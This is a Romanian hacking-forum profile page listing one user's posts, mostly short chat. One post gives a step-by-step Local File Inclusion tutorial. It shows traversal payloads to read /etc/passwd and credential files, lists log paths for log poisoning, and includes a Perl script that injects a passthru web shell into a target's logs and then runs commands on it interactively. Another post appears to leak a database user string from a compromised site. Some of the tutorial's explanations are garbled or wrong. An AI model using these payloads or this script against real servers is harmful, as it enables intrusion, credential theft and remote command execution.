Jump to content

Castiel

Active Members
  • Posts

    639
  • Joined

  • Last visited

Everything posted by Castiel

  1. Daca tot e simpla , ia fao tu ma . Pun pariu ca nu rezolvi nimik .
  2. Din moment ce useru a luat ban cred ca pot posta syntaxa . YourTrainer.com.cy - 5.5.35-logaandreou_yourtrainer:Castiel
  3. Bine te-am gasit . Sper sa ne intelegem .
  4. O dovada cva.. ?
  5. WTF!? Dark Panda hacker????
  6. security-antihackers@fbi.al suna bine ,nu?
  7. OFF: Dc il jigniti ? ON: Bine ai venit . wtf ce nume
  8. Multumesc pentru completarii .
  9. Serios , nimeni ?
  10. De la un inger din seria serialelor Supernatural si pentru ca paranormal .
  11. Neeh , nu merita .
  12. Castiel

    Cum-sa.net

    Imi place design-ul si cum trece automat in browser de mobil . Felicitari
  13. https://rstforums.com/forum/79476-noo-hacker.rst#post510906
  14. Scz pt off dar : ZatarraCoi=0x 5a617461727261436f69
  15. La multi ani si sanatate !
  16. Care este emailul lor ?
  17. Deci , de unde iau semnatura si ce data pun ?
  18. http://ionutdesign.ro/index.html ! Pentru incode baa , se stie !!
  19. Da , no sa mai si radem .
  20. Si cum ma pot conecta la baza de date ? Avand datele .
  21. askwrite aveai nevoie de +1 ? ON : LFI - Local File Inclusion
  22. Am spus eu ca este facut de mine:))? Este dupa pro-area eu doar am modificat unele greselii .
  23. Salut , rst! In acest tutorial o sa invatati cum cum sa exploatati vulnerabilitatea LFI dintr-un site. Mai intai, sa vedem acest mic cod php: $page = $_GET[/page][page]; include($page); ?><?php Acesta este un cod care nu ar trebui folosit niciodata, vulnerabil la LFI, pentru ca variabila $page nu este santinizata. Ok, acum sa profitam de aceasta vulnerabilitate, folosind urmatorul cod: site.host/index.php?page=../../../../../../../etc/passwd Daca siteul este gazduit Unix, parolele userilor sunt stocate in /etc/passwd si codul de mai sus ne arata aceste parole si usernameurile. Acum tot ce mai ai de facut este sa decodezi parola. O parola criptata, ar trebui sa arate cam asa: username:x:503:100:FullName:/home/username:/bin/sh In acest exemplu, parola este x, alt exemplu de parola fiind: username:!:503:100:FullName:/home/username:/bin/sh Alte "locuri" unde puteti gasi parolele in afara de /etc/passwd ar cam fi: /etc/group /etc/security/group /etc/security/passwd /etc/security/user /etc/security/environ /etc/security/limits/etc/shadow In caz ca Browserul va arata la sfarsitul includerii un .php (si automat. /etc/passwd.php nu va mai exista), adaugati la sf includerii , serverul va omite tot ce scrie dupa . Exemplu de cod: site.host/index.php?file=../../../../../../../../etc/passwd Acum vom incerca sa rulam comenzi pe server injectand coduri php in loguri, apoi rulandu-le. Cateva adrese de loguri: ../apache/logs/access.log ../../apache/logs/error.log ../../apache/logs/access.log ../../../apache/logs/error.log ../../../apache/logs/access.log ../../../../../../../etc/httpd/logs/acces_log ../../../../../../../etc/httpd/logs/acces.log ../../../../../../../etc/httpd/logs/error_log ../../../../../../../etc/httpd/logs/error.log ../../../../../../../var/www/logs/access_log ../../../../../../../var/www/logs/access.log ../../../../../../../usr/local/apache/logs/access_log ../../../../../../../usr/local/apache/logs/access.log ../../../../../../../var/log/apache/access_log ../../../../../../../var/log/apache2/access_log ../../../../../../../var/log/apache/access.log ../../../../../../../var/log/apache2/access.log ../../../../../../../var/log/access_log ../../../../../../../var/log/access.log ../../../../../../../var/www/logs/error_log ../../../../../../../var/www/logs/error.log ../../../../../../../usr/local/apache/logs/error_log ../../../../../../../usr/local/apache/logs/error.log ../../../../../../../var/log/apache/error_log ../../../../../../../var/log/apache2/error_log ../../../../../../../var/log/apache/error.log ../../../../../../../var/log/apache2/error.log ../../../../../../../var/log/error_log ../../../../../../../var/log/error.log../apache/logs/error.log Ok, acum sa aruncam o privire asupra logului in care se salveaza paginile care nu exista si urmatorul cod: <? passthru(\$_GET[cmd]) ?>. Daca scriem in browser: site.host/<? passthru(\$_GET[cmd]) ?> O sa ne arate evident o pagina in care scrie ca acest cod nu exista pe server, deoarece browserul encodeaza automat URL'ul si pagina pe care noi am accesat-o, browserul o traduce in: site.host/<? passthru(\$_GET[cmd]) ?> Deci va trebui sa facem altceva... Putem utiliza urmatorul script perl: use IO::Socket; use LWP::UserAgent; $site="victim.com"; $path="/folder/"; $code="<? passthru(\$_GET[cmd]) ?>"; $log = "../../../../../../../etc/httpd/logs/error_log"; print "Trying to inject the code"; $socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$site", PeerPort=>"80") or die "\nConnection Failed.\n\n"; print $socket "GET ".$path.$code." HTTP/1.1\r\n"; print $socket "User-Agent: ".$code."\r\n"; print $socket "Host: ".$site."\r\n"; print $socket "Connection: close\r\n\r\n"; close($socket); print "\nCode $code sucssefully injected in $log \n"; print "\nType command to run or exit to end: "; $cmd = <STDIN>; while($cmd !~ "exit") { $socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$site", PeerPort=>"80") or die "\nConnection Failed.\n\n"; print $socket "GET ".$path."index.php=".$log."&cmd=$cmd HTTP/1.1\r\n"; print $socket "Host: ".$site."\r\n"; print $socket "Accept: */*\r\n"; print $socket "Connection: close\r\n\n"; while ($show = <$socket>) { print $show; } print "Type command to run or exit to end: "; $cmd = <STDIN>; }#!/usr/bin/perl -w
×
×
  • Create New...